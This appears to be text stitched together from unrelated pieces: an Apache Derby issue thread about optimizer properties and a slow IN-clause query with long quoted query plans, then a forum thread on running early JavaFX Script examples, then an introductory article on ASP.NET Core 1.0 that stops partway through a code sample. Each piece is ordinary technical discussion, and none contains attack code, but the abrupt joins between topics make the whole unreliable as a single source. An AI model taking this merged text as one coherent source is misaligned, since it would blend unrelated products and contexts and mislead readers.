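        app.UseMvc();
    }
}
```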
Yes, it's a sad fact that WebForms is not part of ASP.NET 5. You can still continue to build Web Forms apps in Visual Studio 2015 by targeting .NET Framework 4.6. However, Web Forms apps cannot take advantage of the new features of ASP.NET 5.
I've spent years building WebForms applications, from small sites to large enterprise apps. I love Web Forms; in fact I still continue supporting the community that uses WebForms at various forums. However, it's time to move forward, learn the new stuff, and it's finally time for you to learn ASP.NET MVC. Like so many things in the past, times are changing and you either adapt or you become extinct.
Aside from WebForms, the .NET Core in general will not include Windows Forms, WCF, WPF, Silverlight and so on.
At the moment, with the current release of ASP.NET Core 1.0 RC2, VB.NET and F# aren't supported.
The new ASP.NET will see MVC, Web API and probably Web Pages combined into one framework called ASP.NET Core. At the current release, though, Web Pages and SignalR are not yet included; they will possibly come in a later release.
In previous versions of ASP.NET MVC, the Html.Action() helper was typically used to invoke a sub-controller. ASP.NET MVC Core introduces the new View Component to replace widgets that use Html.Action().
View Components fully support async, allowing you to make a view component asynchronous. Here's a sample view component that returns person profiles filtered by status:
using Microsoft.AspNetCore.Mvc;
using MVC6Demo.Models;
using System.Threading.Tasks;
using System.Collections.Generic;
using System.Linq;

namespace MVC6Demo.ViewComponents
{
    public class PersonListViewComponent : ViewComponent
    {
        private PersonModel _persons = new PersonModel();

        // Filters person profiles by the supplied status (e.g. "Registered")
        // and hands them to the view. (The filtering details are assumptions;
        // the original listing was truncated at this point.)
        public async Task<IViewComponentResult> InvokeAsync(string type)
        {
            var people = await Task.FromResult(
                _persons.GetAll.Where(o => o.Status.ToLower().Equals(type.ToLower())));
            return View(people);
        }
    }
}
And here's the view for the View Component:
<h3>Person List</h3>
<ul>
@foreach (var p in Model) {
<li>@string.Format("{0} {1}",p.FirstName,p.LastName)</li>
}
</ul>
And here's how you call the View Components in the main view:
<div>
@await Component.InvokeAsync("PersonList", new { type = "Registered" })
</div>
ASP.NET MVC Core has a few new directives that we can use in our applications. Here we'll have a look at how to use @inject. The @inject directive allows you to inject a class instance directly into your view and call its methods. Here's a simple class that exposes some async methods:
using System.Threading.Tasks;
using System.Linq;

namespace MVC6Demo.Models
{
    public class Stats
    {
        private PersonModel _persons = new PersonModel();

        public async Task<int> GetPersonCount()
        {
            return await Task.FromResult(_persons.GetAll.Count());
        }

        public async Task<int> GetRegisteredPersonCount()
        {
            return await Task.FromResult(
                _persons.GetAll.Where(o => o.Status.ToLower().Equals("registered")).Count());
        }

        public async Task<int> GetUnRegisteredPersonCount()
        {
            return await Task.FromResult(
                _persons.GetAll.Where(o => o.Status.ToLower().Equals("")).Count());
        }
    }
}
Now we can call those methods in the view using @inject like:
@inject MVC6Demo.Models.Stats Stats
@{
ViewBag.Title = "Stats";
}
<div>
    <p>Registered: @await Stats.GetRegisteredPersonCount()</p>
</div>
That's pretty cool! Isn't it? :D
Check out my article about ASP.NET MVC Core for detailed example of the new features here: Getting Started with ASP.NET MVC Core
Another cool thing in ASP.NET MVC Core is the tag helpers. Tag helpers are optional replacements for the previous HTML Helpers.
So instead of doing this:
@using (Html.BeginForm("Login", "Account", FormMethod.Post,
new { @class = "form-horizontal", role = "form" }))
{
@Html.AntiForgeryToken()
<h4>Use a local account to log in.</h4>
<hr />
@Html.ValidationSummary(true, "", new { @class = "text-danger" })
<div class="form-group">
@Html.LabelFor(m => m.UserName, new { @class = "col-md-2 control-label" })
<div class="col-md-10">
@Html.TextBoxFor(m => m.UserName, new { @class = "form-control" })
@Html.ValidationMessageFor(m => m.UserName, "", new { @class = "text-danger" })
</div>
</div>
}
You can instead do this:
<form asp-controller="Account" asp-action="Login" method="post" class="form-horizontal" role="form">
    <h4>Use a local account to log in.</h4>
    <hr />
    <div asp-validation-summary="All" class="text-danger"></div>
    <div class="form-group">
        <label asp-for="UserName" class="col-md-2 control-label"></label>
        <div class="col-md-10">
            <input asp-for="UserName" class="form-control" />
            <span asp-validation-for="UserName" class="text-danger"></span>
        </div>
    </div>
</form>
14 years ago, there was basically one web server for ASP.NET platforms and that was IIS. A few years later the Visual Studio Development Web Server (a.k.a. “Cassini”) came along as a dev-only server. Both ultimately used System.Web as the hosting layer between the application and the web server. The System.Web host is tightly coupled to IIS and is very difficult to run on another host.
Later on OWIN came around as an interface between applications and web servers. Microsoft wrote Katana as one OWIN implementation that could host ASP.NET Web API, SignalR and other third-party frameworks on top of several servers, including IIS and IIS Express, Katana's self-host server and custom hosts.
ASP.NET Core is host-agnostic in the same manner as Katana and OWIN, and any ASP.NET Core application can be hosted on IIS, IIS Express or self-hosted in your own process. In addition, ASP.NET Core includes a cross-platform web server called Kestrel, built on libuv, which lets apps be served on OSX and Linux-based operating systems.
ASP.NET Core introduces a new HTTP request pipeline that is modular so you can add only the components that you need. The pipeline is also no longer dependent on System.Web. By reducing the overhead in the pipeline, your app can experience better performance and better-tuned HTTP stacks. The new pipeline is based on much of what was learned from the Katana project and also supports OWIN.
Another cool feature in Visual Studio 2015 is the ability to do dynamic compilation. In the previous versions of ASP.NET, when we change code in our application, we are required to compile and build the application every time we want to see the changes. In the new version of Visual Studio there's no need to do those extra steps anymore, instead you just need to save the file that you are modifying and then refresh the browser to see the changes.
Here's the output after refreshing the browser:
In previous versions of MVC and Web API, working with attribute routing could cause trouble, especially when refactoring code. This is because the route always had to be specified as a string, so whenever you renamed a controller you also had to update the string in the route attribute.
MVC Core introduces the new [controller] and [action] tokens that can resolve this kind of issue. Here's an excellent article that highlights the use of these new tokens: ASP.NET MVC 6 Attribute Routing.
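For example (the controller name here is illustrative):

```csharp
// [controller] and [action] are resolved at runtime, so renaming the class
// or the method during refactoring no longer breaks a hard-coded route string.
[Route("[controller]/[action]")]
public class ProductsController : Controller
{
    // Matches GET /Products/Index
    public IActionResult Index() => View();
}
```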
ASP.NET Core has built-in support for Dependency Injection and the Service Locator pattern. This means that you no longer need to rely on third-party Dependency Injection frameworks such as Ninject or AutoFac.
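A small sketch of the built-in container (the interface and class names are mine):

```csharp
public interface IGreeter
{
    string Greet(string name);
}

public class Greeter : IGreeter
{
    public string Greet(string name) => $"Hello, {name}!";
}

// In Startup.ConfigureServices: one registration, no third-party container:
//     services.AddTransient<IGreeter, Greeter>();

public class HomeController : Controller
{
    private readonly IGreeter _greeter;

    // The framework resolves and injects IGreeter automatically
    public HomeController(IGreeter greeter)
    {
        _greeter = greeter;
    }

    public IActionResult Index() => Content(_greeter.Greet("world"));
}
```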
Visual Studio 2015 has built-in support for these popular open-source web development tools. Grunt and Gulp are task runners that help you automate your web development work flow. You can use both for compiling or minifying JavaScript files. Bower is a package manager for client-side libraries, including CSS and JavaScript libraries.
AngularJs is one of the most popular client-side frameworks for building Single Page Applications (SPAs). Visual Studio 2015 includes templates for creating AngularJs modules, controllers, directives and factories.
The support in ASP.NET Core for GruntJS makes ASP.NET an excellent server-side framework for building client-side AngularJs apps. You can combine and minify all of your AngularJs files automatically whenever you do a build. Check my examples about getting started with Angular and Angular2 in ASP.NET Core:
ASP.NET Core will also be the basis for SignalR 3. This enables you to add real time functionality to cloud connected applications. Check my previous SignalR example here: ASP.Net SignalR: Building a Simple Real-Time Chat Application
In ASP.NET Core, the messy web.config file is replaced with a new cloud-ready configuration file called “config.json”. Microsoft wanted to make it easier for developers to deploy apps in the cloud and have the app automatically read the correct configuration values for a specific environment. Here's an example of what the new config file looks like:
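A minimal config.json might look like the following (the section and key names are illustrative assumptions, not the article's exact file):

```json
{
  "AppSettings": {
    "SiteTitle": "MVC6Demo"
  },
  "Data": {
    "DefaultConnection": {
      "ConnectionString": "Server=(localdb)\\mssqllocaldb;Database=MVC6Demo;Trusted_Connection=True;"
    }
  }
}
```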
Since everything in ASP.NET Core is pluggable you need to configure the source for the configuration at the Startup class like:
public Startup(IHostingEnvironment env)
{
    var builder = new ConfigurationBuilder()
        .SetBasePath(env.ContentRootPath)
        .AddJsonFile("config.json");  // read settings from config.json
    builder.AddEnvironmentVariables();
    Configuration = builder.Build();
}

public IConfigurationRoot Configuration { get; }
public void ConfigureServices(IServiceCollection services)
{
    services.AddMvc();
    services.AddTransient<MVC6Demo.Models.HeroStats>();
}
public void Configure(IApplicationBuilder app)
{
    app.UseDeveloperExceptionPage();
    app.UseMvc(m => {
        m.MapRoute(
            name: "default",
            template: "{controller}/{action}/{id?}",
            defaults: new { controller = "Home", action = "Index" });
    });
}
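The route template passed to MapRoute uses {segment} placeholders, with ? marking an optional segment and the defaults filling in missing values. A rough sketch of that matching logic, in Python for illustration (a simplification, not MVC's actual router):

```python
# Simplified sketch of template-based route matching:
# "{controller}/{action}/{id?}" with defaults; '?' marks an optional segment.
def match_route(template, path, defaults):
    tsegs = template.strip("/").split("/")
    psegs = [s for s in path.strip("/").split("/") if s]
    values = dict(defaults)
    for i, tseg in enumerate(tsegs):
        name = tseg.strip("{}").rstrip("?")
        optional = tseg.endswith("?}")
        if i < len(psegs):
            values[name] = psegs[i]        # value supplied in the URL
        elif not (optional or name in defaults):
            return None                    # required segment missing
    return values

# "/" falls back to the defaults; a full path overrides them.
assert match_route("{controller}/{action}/{id?}", "/",
                   {"controller": "Home", "action": "Index"}) == \
       {"controller": "Home", "action": "Index"}
assert match_route("{controller}/{action}/{id?}", "/Hero/Detail/3",
                   {"controller": "Home", "action": "Index"}) == \
       {"controller": "Hero", "action": "Detail", "id": "3"}
```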
In previous versions of ASP.NET MVC, the default testing framework was the Visual Studio Unit Testing Framework (sometimes called mstest). This framework uses the [TestClass] and [TestMethod] attributes to describe a unit test.
ASP.NET Core uses xUnit.net as its unit test framework. This framework uses the [Fact] attribute instead of the [TestMethod] attribute and eliminates the need for the [TestClass] attribute.
Yes, ASP.NET Core is an open source project on GitHub. You can view the code, see when changes were made, download the code and submit changes.
I would agree that open-sourcing .NET makes good sense. It makes good business sense and good community sense. A big thanks to Microsoft. Job well done!
I hope someone finds this article useful. :)
In this article we've learned some of the new cool features and concepts in ASP.NET Core. | https://www.codeproject.com/articles/1104668/introducing-asp-net-core-the-new-asp-net-in-town | CC-MAIN-2017-04 | refinedweb | 2,277 | 59.8 |
Hello, I'm rather new at C++ and I was wondering if you guys could help me out with something I'm trying to do. What I want to do is make it so when I type something like "apple" the cmd comes back and picks a random word that I supply it to say.
Also how could I make it so I can keep typing words in after I get one answer, I want to be able to just keep telling it words without the CMD going "Press any key to continue" and exiting out. Thanks for any help! This is the only code I have so far:
Code:
// Random Words
#include <iostream>
#include <cmath>

void myfun (int);

int main ()
{
    using namespace std;
    cout << endl;
    cout << endl;
    cout << "You: ";
    int userinput;
    cin >> userinput;
    myfun(userinput);
    system("pause");
    return 0;
}

void myfun(int x)
{
    using namespace std;
    cout << endl;
    cout << "Your Computer: apple" << endl;
    cout << endl;
}
Given
scala> def method(x: Int) = x
method: (x: Int)Int
scala> val func = (x: Int) => x
func: Int => Int = <function1>
scala> method _
res0: Int => Int = <function1>
scala> func(_)
res1: Int => Int = <function1>
scala> func _
res2: () => Int => Int = <function0>
res0
res1
(x) => func(x)
res2
This is actually a bit tricky. First, let's see what happens outside the REPL.

It doesn't work when func is a local variable:

object Main extends App {
  def foo() = {
    val f = (_: Int) + 1
    f _
  }
  println(foo())
}

[error] /tmp/rendereraEZGWf9f1Q/src/main/scala/test.scala:8: _ must follow method; cannot follow Int => Int
[error]     f _
[error]       ^
But if you put it outside def foo, it compiles:

object Main extends App {
  val f = (_: Int) + 1
  val f1 = f _
  println(f1)
}
because f is both a field of Main and a method without arguments which returns the value of this field.
The final piece is that the REPL wraps each line into an object (because Scala doesn't allow code to appear outside a trait/class/object), so

scala> val func = (x: Int) => x
func: Int => Int = <function1>
is really something like

object Line1 {
  val func = (x: Int) => x
}
import Line1._
// print result
So func on the next line refers to Line1.func, which is a method and so can be eta-expanded.
You may have heard about our foray into writing a native app using Elm Native UI. Purple Train accomplishes its goals quite well for us. It’s not only a useful product, it’s also a learning experience for us. We decided that it’s only fair for us to try to push the boundaries of the technology.
After we submitted the first Elm version to the Apple App Store, I entered what I thought would be a simple issue on the project: when you open the Stop Picker, it should be scrolled to the stop that’s selected instead of being at the top of the list. It became a prime example of why you should not tell a developer that something is “just a small change”.
Imperativeness in a land of Declarations
The biggest problem is that when the Stop Picker opens, we want code to execute that affects the state of the UI. The Elm Architecture builds its UIs in a declarative manner. You say “There’s a scroll view here and it contains a list of buttons” and the display layer takes care of laying that out on the screen for you. There’s no place to say “When the box is displayed, execute this code”.
In order to get this to work, we decided to play nice with declarations instead
of trying to fight them. We wanted a way to declare that a given element should
be marked as the scroll target when the box is rendered. You’ve undoubtedly seen
this pattern when using a loop to generate some HTML
<option> tags and one is
<option selected="true">. We had to make the function that generates the
button be able to tell if it’s the selected one. We also had to be able to pass
the selected button down the chain so the function can figure that out.
The code to generate a button in the Stop Picker originally looked like this:
stopButton : Stop -> Node Msg
stopButton stop =
    pickerButton (PickStop stop) stop
Where
pickerButton called
Element.touchableHighlight to create the button
and
PickStop stop is the message we send our event loop.
We changed the
stopButton function to this:
stopButton : Maybe Stop -> Stop -> Node Msg
stopButton highlightStop stop =
    case highlightStop of
        Nothing ->
            pickerButton (PickStop stop) stop

        Just pickedStop ->
            if stop == pickedStop then
                highlightPickerButton (PickStop stop) stop
            else
                pickerButton (PickStop stop) stop
And we pass in the already-selected stop or
Nothing if there isn’t one.
The main difference between
pickerButton and
highlightPickerButton is that
they pass a
scrollTarget property to the
touchableHighlight call. This lets
the underlying component know where it should scroll to on load.
This whole setup lets us define what’s special about the situation using Elm
instead of using JS. We tried a few ways of letting Elm handle React Native’s
componentDidMount callback, but ultimately had to fall back to JavaScript.
The State of the UI
Since Elm Native UI is built on top of React Native, it’s possible to drop down into that more imperative land of JavaScript to do things we can’t do (or, at least, we haven’t yet specified a way to do) in Elm. Thankfully, since Elm compiles to JavaScript, it’s rather straightforward to craft some JavaScript code that Elm is able to use.
What we need here is a React component that knows that it needs to find and
scroll to a sub-element once it’s mounted into the UI. We’ll need to hook into
the
componentDidMount callback because we need values (height, specifically)
from the rendered state of the component.
In the file
app/Native/ScrollWrapper.js, we created a component subclass that
looks like this:
const _user$project$Native_ScrollWrapper = function () {
  var ScrollView = require('ScrollView');

  class ScrollWrapper extends ScrollView {
    componentDidMount() {
      // Find the child node that has the `scrollTarget` property
      // Scroll to that node with `this.scrollTo();`
    }
  }

  return { view: ScrollWrapper };
}();
Because we named the
const “
_user$project$Native_ScrollWrapper”, we’ll be
accessing it in Elm as
Native.ScrollWrapper. We also need this Elm code in
app/ScrollWrapper.elm:
module ScrollWrapper exposing (view)

import NativeUi exposing (Node, Property)
import Native.ScrollWrapper

view : List (Property msg) -> List (Node msg) -> Node msg
view =
    NativeUi.customNode "ScrollWrapper" Native.ScrollWrapper.view
Once we have this in place, we can
import ScrollWrapper in our Elm view and we
can replace the call to
Element.scrollView with
ScrollWrapper.view.
Now that all this is in place, we can refresh the app in the iOS Simulator and see the results:
Getting Things Done
I admit, this isn’t the best thing to have to do. I’d much prefer that we can specify this kind of extension in pure Elm. That’s the point of writing Elm, after all. But it’s very useful that we can interact with JavaScript in this way. Even if we could write new functionality to extend the framework in Elm, there is a lot of existing code written in JavaScript that could be very useful to include in a project. It’s comforting to know that it’s fairly easy to access should we need it. | https://thoughtbot.com/blog/extending-elm-native-ui-with-javascript | CC-MAIN-2019-35 | refinedweb | 858 | 59.84 |
Introduction
The objective of this post is to explain how to execute MicroPython scripts using the uPyCraft IDE. If you haven’t yet set up and tested uPyCraft, please consult this previous post.
Although we have access to the MicroPython prompt to send commands, writing an application is much more convenient if we can write our MicroPython code in a file and then execute it. This is what we are going to do in this simple example.
The tests of this ESP32 tutorial were performed using a DFRobot’s ESP-WROOM-32 device integrated in a ESP32 FireBeetle board.
Testing the procedure
In order to execute a MicroPython script, we will need to create a new file where we will write our script’s code. To create a new file, we just need to click the button highlighted in figure 1, on the uPyCraft IDE.
Figure 1 – Creating a new MicroPython script file.
After clicking the button, a new file tab should appear, as indicated in figure 2. There, we can write our MicroPython script to later run on the ESP32.
Figure 2 – uPyCraft script editor.
The script we are going to write is a very simple hello world message and is shown bellow. You can copy and past to try it on your environment.
print ("Hello world from script")
Then, we need to save the file, so we can upload it to the ESP32 board. To do so, just click the icon highlighted in figure 3 and specify a name in the popup window. Finally, click the “ok” button.
Figure 3 – Saving the MicroPython script file.
Now, to upload the file, just click the icon highlighted in figure 4. It should connect to the MicroPython prompt. If you haven’t yet done the initial board configuration and flashing of the MicroPython firmware, please consult this previous post.
Figure 4 – Connecting to the MicroPython prompt.
Finally, just hit the upload button, indicated in figure 5. After that, the script should get uploaded to the ESP32 and after that the script will run, showing the output on the prompt at the bottom of the IDE window.
Figure 5 – Successful upload and execution of MicroPython script file.
Note that the file with the script will be uploaded to the ESP32 and thus will be persisted on the file system. To confirm that, we just need to go to the prompt and send the following commands:
import os
os.listdir()
As indicated in figure 6, the testScript.py file we uploaded is persisted on the file system and will stay there even after disconnecting from the board.
Figure 6 – Script file persisted on file system of the ESP32.
We can re-run the file from the prompt just by importing its content with the command shown bellow:
import testScript
We should get the same print we obtained before after uploading the file, as indicated in figure 7.
Figure 7 – Re-running the script file uploaded to the ESP32.
If you don’t want to leave the uploaded file in the file system, you can simply send the following command to delete it, assuming a previous import of the os module, as we did before:
os.remove('testScript.py')
Figure 8 illustrates the removal of the previously uploaded file. Note that in that example I’ve disconnected the board and connected again, just to confirm that the file stays in the file system.
Figure 8 – Removal of the previously uploaded script file. | https://techtutorialsx.com/2017/07/22/esp32-micropython-executing-scripts-with-upycraft/ | CC-MAIN-2017-34 | refinedweb | 579 | 63.59 |
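The calls used on the board (os.listdir, os.remove) mirror standard Python's os module, so the whole upload, verify, and delete cycle can be rehearsed on a desktop machine. This sketch runs locally, not on the ESP32:

```python
import os
import tempfile

# Stand-in for the board's file system.
workdir = tempfile.mkdtemp()

# "Upload" the script: persist it, as uPyCraft's upload button does.
with open(os.path.join(workdir, "testScript.py"), "w") as f:
    f.write('print ("Hello world from script")\n')

# Confirm it is persisted, as os.listdir() showed on the board.
assert "testScript.py" in os.listdir(workdir)

# Delete it again, as os.remove('testScript.py') did on the board.
os.remove(os.path.join(workdir, "testScript.py"))
assert "testScript.py" not in os.listdir(workdir)
```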
One of the most fundamental parts of web development is the user registration form. Every website needs sign up and sign in forms. This is the basic thing. In this article I am going to cover the Django user registration form.
You may have created a Django superuser using the command line, and a superuser can go to the admin dashboard. But this is different: not everyone can access the admin dashboard, and we can't create 100 or more users using the command line.
This is where a sign up form is helpful. People can create an account using this sign up page.
Django User Registration Form :
Assumptions:

You know:
1. How to create a Django project.
2. How to create a superuser.
3. The basics of Django.
4. How to create an app in Django.
1.) Create New Application:
The first thing to do is create a new application inside your project: a new app named accounts.

The command is: python manage.py startapp accounts
After creating the accounts app, we must register it in INSTALLED_APPS in the settings file: just write 'accounts' inside INSTALLED_APPS.
settings.py file
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'admission',
    'password_generator',
    'demo',
    'crispy_forms',
    'accounts',
]
2. Create a Sign Up page :
After creating the accounts app and adding it to the settings file, the first thing we need to do is create a forms.py file inside the accounts app.

Whenever you create a sign up page, you need certain fields, such as Username, First Name, Last Name, Email, Password and Confirm Password.

Django gives us all these things; we just need to call them. We don't have to do any extra work, unless we want to.

Add the following code to the forms.py file.
# forms.py
from django import forms
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User

class RegisterForm(UserCreationForm):
    email = forms.EmailField()

    class Meta:
        model = User
        fields = ["username", "first_name", "last_name", "email",
                  "password1", "password2"]
We have modified Django's default sign up form by adding an email field. If you want to add more fields, you can: just list them inside fields and define them as class attributes. A field can go anywhere inside fields; its position controls where it shows up on the form.
I am not going to explain every detail, like what UserCreationForm is or where it comes from. You should search for these things yourself; that is good practice.
Now we need to add a function inside our views.py file. Open views.py and add the following code.
from django.shortcuts import render, redirect
from .forms import RegisterForm

def register(request):
    if request.method == "POST":
        form = RegisterForm(request.POST)
        if form.is_valid():
            form.save()
            return redirect("/accounts/")
    else:
        form = RegisterForm()
    return render(request, "accounts/register.html", {"form": form})
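Inside the view, form.is_valid() does the real work: it runs each field's validators and checks that the two passwords match. A framework-free sketch of that idea (validate_registration is a hypothetical helper, not Django's API):

```python
# A framework-free sketch of what RegisterForm.is_valid() checks for us.
# validate_registration is a hypothetical helper, not part of Django's API.
def validate_registration(data):
    errors = {}
    if not data.get("username"):
        errors["username"] = "This field is required."
    if "@" not in data.get("email", ""):
        errors["email"] = "Enter a valid email address."
    if data.get("password1") != data.get("password2"):
        errors["password2"] = "The two password fields didn't match."
    return errors

# Valid submission -> no errors, so the view saves and redirects.
ok = validate_registration({
    "username": "geeky", "email": "geeky@example.com",
    "password1": "s3cret!", "password2": "s3cret!",
})
assert ok == {}

# Mismatched passwords -> the form re-renders with an error instead.
bad = validate_registration({
    "username": "geeky", "email": "geeky@example.com",
    "password1": "s3cret!", "password2": "typo",
})
assert "password2" in bad
```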
Before going to templates, you must configure the urls.py of both your project and your app.

Go to your project's urls.py and add the code that routes to the app's URLs.

Main urls.py:
from django.contrib import admin
from django.urls import path, include

urlpatterns = [
    path('admin/', admin.site.urls),
    path('password/', include('password_generator.urls')),
    path('accounts/', include('accounts.urls')),  # add this line of code in your file
]
Now go to your accounts app and create a file named urls.py and add the following lines.
accounts/urls.py
from django.urls import path, include
from . import views

urlpatterns = [
    path("", views.register, name="register"),
]
Now you can move on to the template. You must know how templates are rendered in Django: first create a folder named templates inside your accounts app, then create another folder inside templates named accounts, and then create register.html.
Structure looks like this :
accounts/templates/accounts/register.html
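That nested layout can be created by hand or scripted; here is a quick sketch using plain Python (the paths are this tutorial's, the script itself is just illustrative):

```python
import os
import tempfile

# Create accounts/templates/accounts/register.html under a scratch directory.
base = tempfile.mkdtemp()
register_path = os.path.join(base, "accounts", "templates",
                             "accounts", "register.html")

os.makedirs(os.path.dirname(register_path), exist_ok=True)
with open(register_path, "w") as f:
    f.write("<!DOCTYPE html>\n")

assert os.path.exists(register_path)
```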
<!DOCTYPE html> <html lang="en">
The signup page looks like this: without styling, just Bootstrap for the sign up button.

Go to the address:

Our sign up page is done. Fill in the form and click Register. Congrats, you successfully created a Django registration form.
Now, to style this Django user registration form, we need to install crispy forms.
Install Crispy Forms :
pip install django-crispy-forms
After installing crispy forms, go to settings -> INSTALLED_APPS and then write 'crispy_forms'.
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'password_generator',
    'crispy_forms',  # add this to your file.
    'accounts',
]
After that, add the following line to your settings file, after STATIC_URL.
CRISPY_TEMPLATE_PACK = "bootstrap4"
Now the final part.

In register.html you wrote {{ form }}; we need to change that to {{ form|crispy }}. You also have to write, at the top of the template:

{% load crispy_forms_tags %}
<!doctype HTML>

And inside <form>:

{% csrf_token %}
{{ form|crispy }}
Final Product looks like this.
You can always change the design of your sign up form. The next tutorial will cover the log in and log out pages.
Conclusion: Django User Registration Form
These are the basics of the Django user registration form. There is always more. The next tutorial will cover the log in form and log out page. If you find any errors, please feel free to correct them; that will be an honour. Thank you for reading.
Also Read : Best Python IDE | You must use.
Also Read : Python anywhere | Host Python application | http://www.geekyshadow.com/2020/06/21/django-user-registration-form/ | CC-MAIN-2020-40 | refinedweb | 876 | 62.14 |
Preface

Recently I have been working on a small project: a desktop client tool based on electron-vue. As I am a pure back-end developer, my front-end knowledge is still basic JS, jQuery, etc., so please go easy on me, front-end gods~

Scenario

As the project is a single-page application, it needs to record some state information after login, so that page data can be refreshed when the data is updated.

This was my first time using Electron and Vue, and I didn't have a deep understanding of Vue. On the principle that the simpler the better, I started developing once I understood the basic usage, and I wrote all the information I wanted to record into sessionStorage.

Although this method is simple, it is not a reasonable place to keep state or information that needs to be passed around. Later I came across Vuex, so I am recording the whole process of using it here.
What is Vuex

Vuex is a state management pattern for Vue.js applications. It uses a centralized store to manage the state of all the components of an application, with rules ensuring that the state can only be mutated in a predictable way.

The above is the official introduction; please refer to the official Vuex website for more information.
Integrating Vuex with electron-vue

- Preconditions

This project uses the standard project structure generated by the electron-vue CLI.

- Under src/store/modules, add a store JS file for each module. In this case it is named User.js.

In that file, define the state variables that need to be recorded, plus getters (so pages can read the values):
const state = {
  bucketId: ''  // default value
}

const getters = {
  bucketId: state => state.bucketId
}

const mutations = {
  updateBucketId(state, bucketId) {
    state.bucketId = bucketId
  }
}

export default {
  state,
  mutations
}
In the Vue file where we need to get the state value, we add the following:
export default {
  computed: {
    bucketId() {
      return this.$store.state.User.bucketId
    }
  },
}
Here’s how to use variables:
<span style="float:right">{{ username }}</span>
Note: 'User' here must match the module's file name (User.js); it is effectively the module name.
How to update variables: in a Vue file, we can directly use the following method:
this.$store.commit('updateBucketId', response.data[index].bucketId)
If we want to use it in a plain utility JS file, here's how:
import store from '../store'

store.commit('updateBucketId', '1111111')
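The contract shown above (one state object that is only modified through named mutations via commit) is not specific to Vue. A minimal Python sketch of the same idea, purely illustrative and not Vuex's implementation:

```python
# Minimal store: state is only changed through registered, named mutations.
class Store:
    def __init__(self, state, mutations):
        self.state = state
        self._mutations = mutations

    def commit(self, name, payload):
        # Look up the mutation by name and apply it to the state.
        self._mutations[name](self.state, payload)

def update_bucket_id(state, bucket_id):
    state["bucketId"] = bucket_id

store = Store({"bucketId": ""}, {"updateBucketId": update_bucket_id})
store.commit("updateBucketId", "1111111")
assert store.state["bucketId"] == "1111111"
```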
That wraps up this simple integration of electron-vue and Vuex. Since this is an experimental, learning-oriented demo, the focus is on basic usage.
Re: Unsubscribing
- From: "Mark Haney" <mhaney@xxxxxxxxxxxxxxxx>
- Date: Wed, 03 Sep 2008 08:56:05 -0400
Chris Jeffries wrote:
I don't complain that my issues have not been addressed - if no-one
knows anything to help, fair enough.
What has pissed me off is that 90% of what I have looked through is
either 'experts' slagging off people who are seeking help because they
are not expert enough in how they ask the question (we all had to take
our first step sometime) or everyone else piling in to slag off the
person who slagged off the newbie - and so it goes on. There's just too
much chaff and not enough wheat.
Hopefully I can find more productive places to find support when I need
it. If not, maybe I will return (reluctantly) to Windows.
Bye guys.
90%? I don't think so. For the most part, people here are very nice
and helpful. But, like anything there are a few who aren't. As for the
last little issue we had, that was caused by nothing more than a troll.
You'll see those everywhere, no matter what list you join.
As for me (and I'm sure the 'experts' comment was directed at me
mostly), I am quite aware we all had to start somewhere. But nowhere
else do you see a person say 'it's broke, fix it' and expect the
'experts' to pull a fix out of their butts without knowing the problem.
How many times have you gone to have your car looked at and NOT
explained what the symptoms are? That's all we ask. I'd rather be
inundated with too much info, rather than not enough. Is that so hard
to ask?
I will also say this. In my case, I am on over a dozen lists. Most of
which get a couple mails a day. Over the years I've managed to get
pretty good at condensing things down to a manageable level. But it's a
LOT of data to sift through over the course of a day. And, in a good
many cases, I know I've overlooked threads and had my threads over
looked. In that case, you need to re-submit the problem, maybe in
bolder type, just to get it back in our minds. It happens. There are
too few people on these lists who know a little bit of everything to be
able to catch everything that comes through. That's why I am such an
advocate for teaching as I help fix a problem. And push for getting
people to experiment on their own. The more people who become
knowledgeable, the less demand is placed on us 'experts'.
I'm not here to hold anyone's hand. I'm here to help you begin to
figure things out on your own. You know the parable about teaching a
man to fish, etc. That's what these lists needs.
I hate to see you go, hopefully you'll move to another linux distro or
list. But, honestly, even in the Windows lists, you'll find the same
problems.
--
Libenter homines id quod volunt credunt (men gladly believe what they wish) -- Caius Julius Caesar
Mark Haney
Sr. Systems Administrator
ERC Broadband
(828) 350-2415
Call (866) ERC-7110 for after hours support
--
ubuntu-users mailing list
ubuntu-users@xxxxxxxxxxxxxxxx
Modify settings or unsubscribe at:
- References:
- Unsubscribing
- From: Chris Jeffries
Pattern matching and Recursion in Scala
People coming from a Java background might have used switch case as a means to implement the strategy pattern, or just for routing to a different workflow based on some flag value. Scala provides pattern matching on different types, which fits multiple scenarios. In this blog we will see how pattern matching can be leveraged to perform operations on a List using recursion.
Java switch case vs Scala pattern matching
In the code below, you can see sample switch-case code to get the salary of an employee, with some side effects (obviously ;))
public int getSalary(int payCode) {
    switch (payCode) {
        case 1:
            emp.setEmployeeType(Type.ENGINEER);
            break;
        case 2:
            emp.setEmployeeType(Type.TEAMLEAD);
            break;
        case 3:
            emp.setEmployeeType(Type.ARCHITECT);
            break;
        default:
            emp.setEmployeeType(Type.DEFAULT);
            break;
    }
    return calculateSalary(emp);
}
Here’s how we can reimplement the same in scala with pattern matching
def getSalary(payCode : Int) = payCode match {
case 1 => calculateSalary(emp.setEmployeeType(Type.ENGINEER))
case 2 => calculateSalary(emp.setEmployeeType(Type.TEAMLEAD))
case 3 => calculateSalary(emp.setEmployeeType(Type.ARCHITECT)) case _ => calculateSalary(emp.setEmployeeType(Type.DEFAULT))
}
Now that you have seen how switch case in Java maps to pattern matching in Scala, let's dive into using Scala to perform operations on a List.
Step 1. Create a list trait and implement it in a case class
sealed trait MyList
case class Cons(head: Int, tail: MyList) extends MyList
case object Nil extends MyList
The above code demonstrates a simple trait which we have extended in the Cons class to provide structure in the form of the head and tail of a list. Now we will create a companion object that can be used to instantiate the list in the REPL.
Step 2. Create companion object
object MyList {
  def apply(as: Int*): MyList = {
    if (as.isEmpty) Nil else Cons(as.head, apply(as.tail: _*))
  }
}
Step 3. Add a method in trait to sum all the numbers present in the List
Now that we have a List, we would want to write functions as part of the trait which will be invoked on the List object. Here’s a sumAll method which provides a summation of all the Integers present in the list.
def sumAll: Int = this match {
  case Cons(h, t) => h + t.sumAll
  case Nil => 0
}
